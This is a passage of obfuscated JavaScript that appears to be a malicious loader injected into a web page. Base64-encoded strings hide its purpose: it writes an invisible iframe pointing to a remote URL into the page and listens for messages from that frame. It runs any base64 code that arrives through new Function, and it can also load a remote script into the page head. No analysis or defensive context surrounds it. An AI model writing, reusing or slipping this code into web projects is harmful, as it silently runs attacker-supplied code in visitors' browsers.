sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }feduaCqt4893();